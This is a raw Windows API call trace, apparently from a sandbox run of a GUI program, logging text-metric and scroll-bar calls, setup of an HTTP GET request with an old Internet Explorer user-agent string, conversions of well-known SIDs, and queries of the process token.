[0149.836] GetDC (hWnd=0x0) returned 0x6401085e
[0149.836] GetTextMetricsA (in: hdc=0x6401085e, lptm=0x18ee7c | out: lptm=0x18ee7c) returned 1
[0149.836] SelectObject (hdc=0x6401085e, h=0xd0a088a) returned 0x18a002e
[0149.836] GetTextMetricsA (in: hdc=0x6401085e, lptm=0x18eeb4 | out: lptm=0x18eeb4) returned 1
[0149.836] SelectObject (hdc=0x6401085e, h=0x18a002e) returned 0xd0a088a
[0149.836] ReleaseDC (hWnd=0x0, hDC=0x6401085e) returned 1
[0149.836] GetSystemMetrics (nIndex=6) returned 1
[0149.837] GetDC (hWnd=0x0) returned 0x6401085e
[0149.837] GetTextMetricsA (in: hdc=0x6401085e, lptm=0x18f178 | out: lptm=0x18f178) returned 1
[0149.837] SelectObject (hdc=0x6401085e, h=0xd0a088a) returned 0x18a002e
[0149.837] GetTextMetricsA (in: hdc=0x6401085e, lptm=0x18f1b0 | out: lptm=0x18f1b0) returned 1
[0149.837] SelectObject (hdc=0x6401085e, h=0x18a002e) returned 0xd0a088a
[0149.837] ReleaseDC (hWnd=0x0, hDC=0x6401085e) returned 1
[0149.837] GetSystemMetrics (nIndex=6) returned 1
[0149.837] GetDC (hWnd=0x0) returned 0x6401085e
[0149.837] GetTextMetricsA (in: hdc=0x6401085e, lptm=0x18ee7c | out: lptm=0x18ee7c) returned 1
[0149.837] SelectObject (hdc=0x6401085e, h=0xd0a088a) returned 0x18a002e
[0149.837] GetTextMetricsA (in: hdc=0x6401085e, lptm=0x18eeb4 | out: lptm=0x18eeb4) returned 1
[0149.837] SelectObject (hdc=0x6401085e, h=0x18a002e) returned 0xd0a088a
[0149.837] ReleaseDC (hWnd=0x0, hDC=0x6401085e) returned 1
[0149.837] GetSystemMetrics (nIndex=6) returned 1
[0149.838] GetDC (hWnd=0x0) returned 0x6401085e
[0149.838] GetTextMetricsA (in: hdc=0x6401085e, lptm=0x18f178 | out: lptm=0x18f178) returned 1
[0149.838] SelectObject (hdc=0x6401085e, h=0xd0a088a) returned 0x18a002e
[0149.838] GetTextMetricsA (in: hdc=0x6401085e, lptm=0x18f1b0 | out: lptm=0x18f1b0) returned 1
[0149.838] SelectObject (hdc=0x6401085e, h=0x18a002e) returned 0xd0a088a
[0149.838] ReleaseDC (hWnd=0x0, hDC=0x6401085e) returned 1
[0149.838] GetSystemMetrics (nIndex=6) returned 1
[0149.838] GetDC (hWnd=0x0) returned 0x6401085e
[0149.838] GetTextMetricsA (in: hdc=0x6401085e, lptm=0x18ee7c | out: lptm=0x18ee7c) returned 1
[0149.838] SelectObject (hdc=0x6401085e, h=0xd0a088a) returned 0x18a002e
[0149.838] GetTextMetricsA (in: hdc=0x6401085e, lptm=0x18eeb4 | out: lptm=0x18eeb4) returned 1
[0149.838] SelectObject (hdc=0x6401085e, h=0x18a002e) returned 0xd0a088a
[0149.838] ReleaseDC (hWnd=0x0, hDC=0x6401085e) returned 1
[0149.838] GetSystemMetrics (nIndex=6) returned 1
[0149.839] GetDC (hWnd=0x0) returned 0x6401085e
[0149.839] GetTextMetricsA (in: hdc=0x6401085e, lptm=0x18f164 | out: lptm=0x18f164) returned 1
[0149.839] SelectObject (hdc=0x6401085e, h=0xd0a088a) returned 0x18a002e
[0149.839] GetTextMetricsA (in: hdc=0x6401085e, lptm=0x18f19c | out: lptm=0x18f19c) returned 1
[0149.839] SelectObject (hdc=0x6401085e, h=0x18a002e) returned 0xd0a088a
[0149.839] ReleaseDC (hWnd=0x0, hDC=0x6401085e) returned 1
[0149.839] GetSystemMetrics (nIndex=6) returned 1
[0149.842] SysReAllocStringLen (in: pbstr=0x2a7f388*=0x0, psz="GET", len=0x3 | out: pbstr=0x2a7f388*="GET") returned 1
[0149.842] CharUpperBuffW (in: lpsz="GET", cchLength=0x3 | out: lpsz="GET") returned 0x3
[0149.842] CharUpperBuffW (in: lpsz="GET", cchLength=0x3 | out: lpsz="GET") returned 0x3
[0149.842] CharUpperBuffW (in: lpsz="GET", cchLength=0x3 | out: lpsz="GET") returned 0x3
[0149.843] SysReAllocStringLen (in: pbstr=0x2a7f388*="GET", psz="GET", len=0x3 | out: pbstr=0x2a7f388*="GET") returned 1
[0149.843] SysReAllocStringLen (in: pbstr=0x2a7f3b8*=0x0, psz="Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; SLCC1)", len=0x39 | out: pbstr=0x2a7f3b8*="Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; SLCC1)") returned 1
[0149.843] InternetQueryOptionW (in: hInternet=0x0, dwOption=0x6, lpBuffer=0x18f200, lpdwBufferLength=0x18f204 | out: lpBuffer=0x18f200, lpdwBufferLength=0x18f204) returned 1
[0149.895] InternetSetOptionW (hInternet=0x0, dwOption=0x6, lpBuffer=0x18f200, dwBufferLength=0x4) returned 1
[0149.895] VirtualFree (lpAddress=0x2a80000, dwSize=0x4000, dwFreeType=0x4000) returned 1
[0149.896] MultiByteToWideChar (in: CodePage=0x3, dwFlags=0x0, lpMultiByteStr=0x2a76490, cbMultiByte=3, lpWideCharStr=0x18e138, cchWideChar=2047 | out: lpWideCharStr="GET") returned 3
[0149.896] CharUpperBuffW (in: lpsz="GET", cchLength=0x3 | out: lpsz="GET") returned 0x3
[0149.896] CharUpperBuffW (in: lpsz="GET", cchLength=0x3 | out: lpsz="GET") returned 0x3
[0149.896] CharUpperBuffW (in: lpsz="GET", cchLength=0x3 | out: lpsz="GET") returned 0x3
[0149.896] SysReAllocStringLen (in: pbstr=0x2a7f388*="GET", psz="GET", len=0x3 | out: pbstr=0x2a7f388*="GET") returned 1
[0149.896] CharUpperBuffW (in: lpsz="GET", cchLength=0x3 | out: lpsz="GET") returned 0x3
[0149.896] CharUpperBuffW (in: lpsz="GET", cchLength=0x3 | out: lpsz="GET") returned 0x3
[0149.896] CharUpperBuffW (in: lpsz="GET", cchLength=0x3 | out: lpsz="GET") returned 0x3
[0149.896] SysReAllocStringLen (in: pbstr=0x2a7f388*="GET", psz="GET", len=0x3 | out: pbstr=0x2a7f388*="GET") returned 1
[0149.898] FlatSB_SetScrollProp (param_1=0xc01a8, index=0x200, newValue=0x0, param_4=1) returned 0
[0149.898] GetSysColor (nIndex=20) returned 0xffffff
[0149.898] FlatSB_SetScrollProp (param_1=0xc01a8, index=0x80, newValue=0xffffff, param_4=0) returned 0
[0149.898] FlatSB_SetScrollInfo (param_1=0xc01a8, code=0, psi=0x18e06e, fRedraw=1)
[0149.898] CallWindowProcA (lpPrevWndFunc=0x2957038, hWnd=0xc01a8, Msg=0x46, wParam=0x0, lParam=0x18df6c) returned 0x0
[0149.903] GetTextExtentPoint32A (in: hdc=0x6401085e, lpString="0", c=1, psizl=0x18f2f4 | out: psizl=0x18f2f4) returned 1
[0149.903] IsIconic (hWnd=0xc01a8) returned 0
[0149.903] GetClientRect (in: hWnd=0xc01a8, lpRect=0x18f2f4 | out: lpRect=0x18f2f4) returned 1
[0149.903] GetWindowLongA (hWnd=0xc01a8, nIndex=-16) returned 116326400
[0149.904] GetWindowLongA (hWnd=0xc01a8, nIndex=-16) returned 116326400
[0149.904] IsIconic (hWnd=0xc01a8) returned 0
[0149.904] GetClientRect (in: hWnd=0xc01a8, lpRect=0x18f23c | out: lpRect=0x18f23c) returned 1
[0149.904] GetWindowLongA (hWnd=0xc01a8, nIndex=-16) returned 116326400
[0149.904] GetWindowLongA (hWnd=0xc01a8, nIndex=-16) returned 116326400
[0149.904] IsIconic (hWnd=0xc01a8) returned 0
[0149.904] GetClientRect (in: hWnd=0xc01a8, lpRect=0x18f20c | out: lpRect=0x18f20c) returned 1
[0149.904] GetWindowLongA (hWnd=0xc01a8, nIndex=-16) returned 116326400
[0149.904] GetWindowLongA (hWnd=0xc01a8, nIndex=-16) returned 116326400
[0149.904] IsIconic (hWnd=0xc01a8) returned 0
[0149.904] GetClientRect (in: hWnd=0xc01a8, lpRect=0x18f20c | out: lpRect=0x18f20c) returned 1
[0149.904] FlatSB_SetScrollProp (param_1=0xc01a8, index=0x200, newValue=0x0, param_4=0) returned 0
[0149.904] GetSysColor (nIndex=20) returned 0xffffff
[0149.904] FlatSB_SetScrollProp (param_1=0xc01a8, index=0x80, newValue=0xffffff, param_4=0) returned 0
[0149.904] FlatSB_SetScrollInfo (param_1=0xc01a8, code=0, psi=0x18f24a, fRedraw=1) returned 0
[0149.904] GetWindowLongA (hWnd=0xc01a8, nIndex=-16) returned 116326400
[0149.904] IsIconic (hWnd=0xc01a8) returned 0
[0149.904] GetClientRect (in: hWnd=0xc01a8, lpRect=0x18f20c | out: lpRect=0x18f20c) returned 1
[0149.904] GetWindowLongA (hWnd=0xc01a8, nIndex=-16) returned 116326400
[0149.904] IsIconic (hWnd=0xc01a8) returned 0
[0149.904] GetClientRect (in: hWnd=0xc01a8, lpRect=0x18f20c | out: lpRect=0x18f20c) returned 1
[0149.904] GetWindowLongA (hWnd=0xc01a8, nIndex=-16) returned 116326400
[0149.904] IsIconic (hWnd=0xc01a8) returned 0
[0149.904] GetClientRect (in: hWnd=0xc01a8, lpRect=0x18f20c | out: lpRect=0x18f20c) returned 1
[0149.904] FlatSB_SetScrollProp (param_1=0xc01a8, index=0x100, newValue=0x0, param_4=0) returned 0
[0149.905] GetSysColor (nIndex=20) returned 0xffffff
[0149.905] FlatSB_SetScrollProp (param_1=0xc01a8, index=0x40, newValue=0xffffff, param_4=0) returned 0
[0149.905] FlatSB_SetScrollInfo (param_1=0xc01a8, code=1, psi=0x18f24a, fRedraw=1) returned 0
[0149.905] GetWindowLongA (hWnd=0xc01a8, nIndex=-16) returned 116326400
[0149.905] IsIconic (hWnd=0xc01a8) returned 0
[0149.905] GetClientRect (in: hWnd=0xc01a8, lpRect=0x18f20c | out: lpRect=0x18f20c) returned 1
[0149.905] GetWindowLongA (hWnd=0xc01a8, nIndex=-16) returned 116326400
[0149.905] GetWindowLongA (hWnd=0xc01a8, nIndex=-16) returned 116326400
[0149.905] IsIconic (hWnd=0xc01a8) returned 0
[0149.905] GetClientRect (in: hWnd=0xc01a8, lpRect=0x18f23c | out: lpRect=0x18f23c) returned 1
[0149.905] GetWindowLongA (hWnd=0xc01a8, nIndex=-16) returned 116326400
[0149.905] GetWindowLongA (hWnd=0xc01a8, nIndex=-16) returned 116326400
[0149.905] IsIconic (hWnd=0xc01a8) returned 0
[0149.905] GetClientRect (in: hWnd=0xc01a8, lpRect=0x18f20c | out: lpRect=0x18f20c) returned 1
[0149.905] GetWindowLongA (hWnd=0xc01a8, nIndex=-16) returned 116326400
[0149.905] GetWindowLongA (hWnd=0xc01a8, nIndex=-16) returned 116326400
[0149.905] IsIconic (hWnd=0xc01a8) returned 0
[0149.905] GetClientRect (in: hWnd=0xc01a8, lpRect=0x18f20c | out: lpRect=0x18f20c) returned 1
[0149.905] FlatSB_SetScrollProp (param_1=0xc01a8, index=0x200, newValue=0x0, param_4=0) returned 0
[0149.905] GetSysColor (nIndex=20) returned 0xffffff
[0149.905] FlatSB_SetScrollProp (param_1=0xc01a8, index=0x80, newValue=0xffffff, param_4=0) returned 0
[0149.905] FlatSB_SetScrollInfo (param_1=0xc01a8, code=0, psi=0x18f24a, fRedraw=1) returned 0
[0149.905] GetWindowLongA (hWnd=0xc01a8, nIndex=-16) returned 116326400
[0149.905] IsIconic (hWnd=0xc01a8) returned 0
[0149.906] GetClientRect (in: hWnd=0xc01a8, lpRect=0x18f20c | out: lpRect=0x18f20c) returned 1
[0149.906] GetWindowLongA (hWnd=0xc01a8, nIndex=-16) returned 116326400
[0149.906] IsIconic (hWnd=0xc01a8) returned 0
[0149.906] GetClientRect (in: hWnd=0xc01a8, lpRect=0x18f20c | out: lpRect=0x18f20c) returned 1
[0149.906] GetWindowLongA (hWnd=0xc01a8, nIndex=-16) returned 116326400
[0149.906] IsIconic (hWnd=0xc01a8) returned 0
[0149.906] GetClientRect (in: hWnd=0xc01a8, lpRect=0x18f20c | out: lpRect=0x18f20c) returned 1
[0149.906] FlatSB_SetScrollProp (param_1=0xc01a8, index=0x100, newValue=0x0, param_4=0) returned 0
[0149.906] GetSysColor (nIndex=20) returned 0xffffff
[0149.906] FlatSB_SetScrollProp (param_1=0xc01a8, index=0x40, newValue=0xffffff, param_4=0) returned 0
[0149.906] FlatSB_SetScrollInfo (param_1=0xc01a8, code=1, psi=0x18f24a, fRedraw=1) returned 0
[0149.906] GetWindowLongA (hWnd=0xc01a8, nIndex=-16) returned 116326400
[0149.906] IsIconic (hWnd=0xc01a8) returned 0
[0149.906] GetClientRect (in: hWnd=0xc01a8, lpRect=0x18f20c | out: lpRect=0x18f20c) returned 1
[0149.906] GetCurrentThreadId () returned 0x524
[0149.906] ConvertSidToStringSidA () returned 0x1
[0149.906] GetModuleHandleA (lpModuleName="kernel32.dll") returned 0x75370000
[0149.907] GetProcAddress (hModule=0x75370000, lpProcName="LocalFree") returned 0x753bca64
[0149.907] LocalFree (hMem=0x646f40) returned 0x0
[0149.907] LocalFree (hMem=0x632f90) returned 0x0
[0149.907] ConvertStringSidToSidA () returned 0x1
[0149.907] CopySid (in: nDestinationSidLength=0x44, pDestinationSid=0x2a72914, pSourceSid=0x632f90*(Revision=0x1, SubAuthorityCount=0x2, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x5), SubAuthority=([0]=0x20, [1]=0x0)) | out: pDestinationSid=0x2a72914*(Revision=0x1, SubAuthorityCount=0x2, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x5), SubAuthority=([0]=0x20, [1]=0x0))) returned 1
[0149.907] IsValidSid (pSid=0x2a72914*(Revision=0x1, SubAuthorityCount=0x2, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x5), SubAuthority=([0]=0x20, [1]=0x0))) returned 1
[0149.907] ConvertSidToStringSidA () returned 0x1
[0149.907] LocalFree (hMem=0x646f40) returned 0x0
[0149.907] LocalFree (hMem=0x632f90) returned 0x0
[0149.907] ConvertStringSidToSidA () returned 0x1
[0149.907] CopySid (in: nDestinationSidLength=0x44, pDestinationSid=0x2a7702c, pSourceSid=0x632f90*(Revision=0x1, SubAuthorityCount=0x2, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x5), SubAuthority=([0]=0x20, [1]=0x0)) | out: pDestinationSid=0x2a7702c*(Revision=0x1, SubAuthorityCount=0x2, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x5), SubAuthority=([0]=0x20, [1]=0x0))) returned 1
[0149.907] IsValidSid (pSid=0x2a7702c*(Revision=0x1, SubAuthorityCount=0x2, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x5), SubAuthority=([0]=0x20, [1]=0x0))) returned 1
[0149.907] ConvertSidToStringSidA () returned 0x1
[0149.907] LocalFree (hMem=0x646f40) returned 0x0
[0149.907] LocalFree (hMem=0x632f90) returned 0x0
[0149.907] ConvertStringSidToSidA () returned 0x1
[0149.907] CopySid (in: nDestinationSidLength=0x44, pDestinationSid=0x2a7f5a0, pSourceSid=0x632f90*(Revision=0x1, SubAuthorityCount=0x2, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x5), SubAuthority=([0]=0x20, [1]=0x0)) | out: pDestinationSid=0x2a7f5a0*(Revision=0x1, SubAuthorityCount=0x2, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x5), SubAuthority=([0]=0x20, [1]=0x0))) returned 1
[0149.907] IsValidSid (pSid=0x2a7f5a0*(Revision=0x1, SubAuthorityCount=0x2, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x5), SubAuthority=([0]=0x20, [1]=0x0))) returned 1
[0149.907] ConvertSidToStringSidA () returned 0x1
[0149.907] LocalFree (hMem=0x646f40) returned 0x0
[0149.907] LocalFree (hMem=0x632f90) returned 0x0
[0149.907] ConvertStringSidToSidA () returned 0x1
[0149.907] CopySid (in: nDestinationSidLength=0x44, pDestinationSid=0x2a7f614, pSourceSid=0x646f40*(Revision=0x1, SubAuthorityCount=0x1, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x5), SubAuthority=0x12) | out: pDestinationSid=0x2a7f614*(Revision=0x1, SubAuthorityCount=0x1, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x5), SubAuthority=0x12)) returned 1
[0149.907] IsValidSid (pSid=0x2a7f614*(Revision=0x1, SubAuthorityCount=0x1, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x5), SubAuthority=0x12)) returned 1
[0149.907] ConvertSidToStringSidA () returned 0x1
[0149.907] LocalFree (hMem=0x646f58) returned 0x0
[0149.907] LocalFree (hMem=0x646f40) returned 0x0
[0149.907] ConvertStringSidToSidA () returned 0x1
[0149.907] CopySid (in: nDestinationSidLength=0x44, pDestinationSid=0x2a7f688, pSourceSid=0x646f40*(Revision=0x1, SubAuthorityCount=0x1, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x5), SubAuthority=0xe) | out: pDestinationSid=0x2a7f688*(Revision=0x1, SubAuthorityCount=0x1, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x5), SubAuthority=0xe)) returned 1
[0149.907] IsValidSid (pSid=0x2a7f688*(Revision=0x1, SubAuthorityCount=0x1, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x5), SubAuthority=0xe)) returned 1
[0149.907] ConvertSidToStringSidA () returned 0x1
[0149.908] LocalFree (hMem=0x646f58) returned 0x0
[0149.908] LocalFree (hMem=0x646f40) returned 0x0
[0149.908] ConvertStringSidToSidA () returned 0x1
[0149.908] CopySid (in: nDestinationSidLength=0x44, pDestinationSid=0x2a7f6fc, pSourceSid=0x646f58*(Revision=0x1, SubAuthorityCount=0x1, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0), SubAuthority=0x0) | out: pDestinationSid=0x2a7f6fc*(Revision=0x1, SubAuthorityCount=0x1, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0), SubAuthority=0x0)) returned 1
[0149.908] IsValidSid (pSid=0x2a7f6fc*(Revision=0x1, SubAuthorityCount=0x1, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0), SubAuthority=0x0)) returned 1
[0149.908] ConvertSidToStringSidA () returned 0x1
[0149.908] LocalFree (hMem=0x63c1c8) returned 0x0
[0149.908] LocalFree (hMem=0x646f58) returned 0x0
[0149.908] ConvertStringSidToSidA () returned 0x1
[0149.908] CopySid (in: nDestinationSidLength=0x44, pDestinationSid=0x2a7f770, pSourceSid=0x646f70*(Revision=0x1, SubAuthorityCount=0x1, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x1), SubAuthority=0x0) | out: pDestinationSid=0x2a7f770*(Revision=0x1, SubAuthorityCount=0x1, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x1), SubAuthority=0x0)) returned 1
[0149.908] IsValidSid (pSid=0x2a7f770*(Revision=0x1, SubAuthorityCount=0x1, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x1), SubAuthority=0x0)) returned 1
[0149.908] ConvertSidToStringSidA () returned 0x1
[0149.908] LocalFree (hMem=0x63c1c8) returned 0x0
[0149.908] LocalFree (hMem=0x646f70) returned 0x0
[0149.908] ConvertStringSidToSidA () returned 0x1
[0149.908] CopySid (in: nDestinationSidLength=0x44, pDestinationSid=0x2a7f7f8, pSourceSid=0x646f40*(Revision=0x1, SubAuthorityCount=0x1, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x2), SubAuthority=0x0) | out: pDestinationSid=0x2a7f7f8*(Revision=0x1, SubAuthorityCount=0x1, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x2), SubAuthority=0x0)) returned 1
[0149.908] IsValidSid (pSid=0x2a7f7f8*(Revision=0x1, SubAuthorityCount=0x1, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x2), SubAuthority=0x0)) returned 1
[0149.908] ConvertSidToStringSidA () returned 0x1
[0149.908] LocalFree (hMem=0x63c1c8) returned 0x0
[0149.908] LocalFree (hMem=0x646f40) returned 0x0
[0149.908] ConvertStringSidToSidA () returned 0x1
[0149.908] CopySid (in: nDestinationSidLength=0x44, pDestinationSid=0x2a7f880, pSourceSid=0x646f40*(Revision=0x1, SubAuthorityCount=0x1, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x5), SubAuthority=0x14) | out: pDestinationSid=0x2a7f880*(Revision=0x1, SubAuthorityCount=0x1, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x5), SubAuthority=0x14)) returned 1
[0149.908] IsValidSid (pSid=0x2a7f880*(Revision=0x1, SubAuthorityCount=0x1, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x5), SubAuthority=0x14)) returned 1
[0149.908] ConvertSidToStringSidA () returned 0x1
[0149.908] LocalFree (hMem=0x646f58) returned 0x0
[0149.908] LocalFree (hMem=0x646f40) returned 0x0
[0149.908] ConvertStringSidToSidA () returned 0x1
[0149.908] CopySid (in: nDestinationSidLength=0x44, pDestinationSid=0x2a7f90c, pSourceSid=0x646f40*(Revision=0x1, SubAuthorityCount=0x1, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x5), SubAuthority=0x13) | out: pDestinationSid=0x2a7f90c*(Revision=0x1, SubAuthorityCount=0x1, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x5), SubAuthority=0x13)) returned 1
[0149.908] IsValidSid (pSid=0x2a7f90c*(Revision=0x1, SubAuthorityCount=0x1, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x5), SubAuthority=0x13)) returned 1
[0149.909] ConvertSidToStringSidA () returned 0x1
[0149.909] LocalFree (hMem=0x646f58) returned 0x0
[0149.909] LocalFree (hMem=0x646f40) returned 0x0
[0149.909] ConvertStringSidToSidA () returned 0x1
[0149.909] CopySid (in: nDestinationSidLength=0x44, pDestinationSid=0x2a7f998, pSourceSid=0x646f40*(Revision=0x1, SubAuthorityCount=0x1, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x5), SubAuthority=0xa) | out: pDestinationSid=0x2a7f998*(Revision=0x1, SubAuthorityCount=0x1, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x5), SubAuthority=0xa)) returned 1
[0149.909] IsValidSid (pSid=0x2a7f998*(Revision=0x1, SubAuthorityCount=0x1, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x5), SubAuthority=0xa)) returned 1
[0149.909] ConvertSidToStringSidA () returned 0x1
[0149.909] LocalFree (hMem=0x646f58) returned 0x0
[0149.909] LocalFree (hMem=0x646f40) returned 0x0
[0149.909] GetModuleHandleA (lpModuleName="kernel32.dll") returned 0x75370000
[0149.909] GetProcAddress (hModule=0x75370000, lpProcName="GetCurrentThread") returned 0x753c3351
[0149.909] GetCurrentThread () returned 0xfffffffe
[0149.909] GetModuleHandleA (lpModuleName="advapi32.dll") returned 0x76da0000
[0149.909] GetProcAddress (hModule=0x76da0000, lpProcName="OpenThreadToken") returned 0x76db432c
[0149.909] OpenThreadToken (in: ThreadHandle=0xfffffffe, DesiredAccess=0xf01ff, OpenAsSelf=1, TokenHandle=0x18eacc | out: TokenHandle=0x18eacc*=0x2953756) returned 0
[0149.910] GetModuleHandleA (lpModuleName="kernel32.dll") returned 0x75370000
[0149.910] GetProcAddress (hModule=0x75370000, lpProcName="GetCurrentProcess") returned 0x753bcdcf
[0149.910] GetCurrentProcess () returned 0xffffffff
[0149.910] GetModuleHandleA (lpModuleName="advapi32.dll") returned 0x76da0000
[0149.910] GetProcAddress (hModule=0x76da0000, lpProcName="OpenProcessToken") returned 0x76db4304
[0149.910] OpenProcessToken (in: ProcessHandle=0xffffffff, DesiredAccess=0xf01ff, TokenHandle=0x2a7fa3c | out: TokenHandle=0x2a7fa3c*=0x1d0) returned 1
[0149.910] GetModuleHandleA (lpModuleName="advapi32.dll") returned 0x76da0000
[0149.910] GetProcAddress (hModule=0x76da0000, lpProcName="MapGenericMask") returned 0x76dc7a73
[0149.910] MapGenericMask (in: AccessMask=0x18e944, GenericMapping=0x18e948 | out: AccessMask=0x18e944)
[0149.910] MapGenericMask (in: AccessMask=0x18ea78, GenericMapping=0x18ea7c | out: AccessMask=0x18ea78)
[0149.911] GetModuleHandleA (lpModuleName="advapi32.dll") returned 0x76da0000
[0149.911] GetProcAddress (hModule=0x76da0000, lpProcName="GetTokenInformation") returned 0x76db431c
[0149.911] GetTokenInformation (in: TokenHandle=0x1d0, TokenInformationClass=0x1, TokenInformation=0x0, TokenInformationLength=0x0, ReturnLength=0x18ea8c | out: TokenInformation=0x0, ReturnLength=0x18ea8c) returned 0
[0149.911] GetModuleHandleA (lpModuleName="kernel32.dll") returned 0x75370000
[0149.911] GetProcAddress (hModule=0x75370000, lpProcName="GetLastError") returned 0x753bbf00
[0149.911] GetLastError () returned 0x7a
[0149.911] GetModuleHandleA (lpModuleName="kernel32.dll") returned 0x75370000
[0149.911] GetProcAddress (hModule=0x75370000, lpProcName="HeapAlloc") returned 0x76f72dd6
[0149.911] GetTokenInformation (in: TokenHandle=0x1d0, TokenInformationClass=0x1, TokenInformation=0x640780, TokenInformationLength=0x24, ReturnLength=0x18eab0 | out: TokenInformation=0x640780, ReturnLength=0x18eab0) returned 1
[0149.911] CopySid (in: nDestinationSidLength=0x44, pDestinationSid=0x2a7fab0, pSourceSid=0x640788*(Revision=0x1, SubAuthorityCount=0x5, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x5), SubAuthority=([0]=0x15, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x65)) | out: pDestinationSid=0x2a7fab0*(Revision=0x1, SubAuthorityCount=0x5, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x5), SubAuthority=([0]=0x15, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x65))) returned 1
[0149.912] IsValidSid (pSid=0x2a7fab0*(Revision=0x1, SubAuthorityCount=0x5, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x5), SubAuthority=([0]=0x15, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x65))) returned 1
[0149.912] ConvertSidToStringSidA () returned 0x1
[0149.912] LocalFree (hMem=0x639e80) returned 0x0
[0149.912] GetModuleHandleA (lpModuleName="kernel32.dll") returned 0x75370000
[0149.912] GetProcAddress (hModule=0x75370000, lpProcName="HeapFree") returned 0x753bbbd0
[0149.912] CopySid (in: nDestinationSidLength=0x44, pDestinationSid=0x2a7fb34, pSourceSid=0x2a7fab0*(Revision=0x1, SubAuthorityCount=0x5, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x5), SubAuthority=([0]=0x15, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x65)) | out: pDestinationSid=0x2a7fb34*(Revision=0x1, SubAuthorityCount=0x5, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x5), SubAuthority=([0]=0x15, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x65))) returned 1
[0149.912] IsValidSid (pSid=0x2a7fb34*(Revision=0x1, SubAuthorityCount=0x5, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x5), SubAuthority=([0]=0x15, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x65))) returned 1
[0149.912] ConvertSidToStringSidA () returned 0x1
[0149.912] LocalFree (hMem=0x639e80) returned 0x0
[0149.912] IsValidSid (pSid=0x2a7fb34*(Revision=0x1, SubAuthorityCount=0x5, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x5), SubAuthority=([0]=0x15, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x65))) returned 1
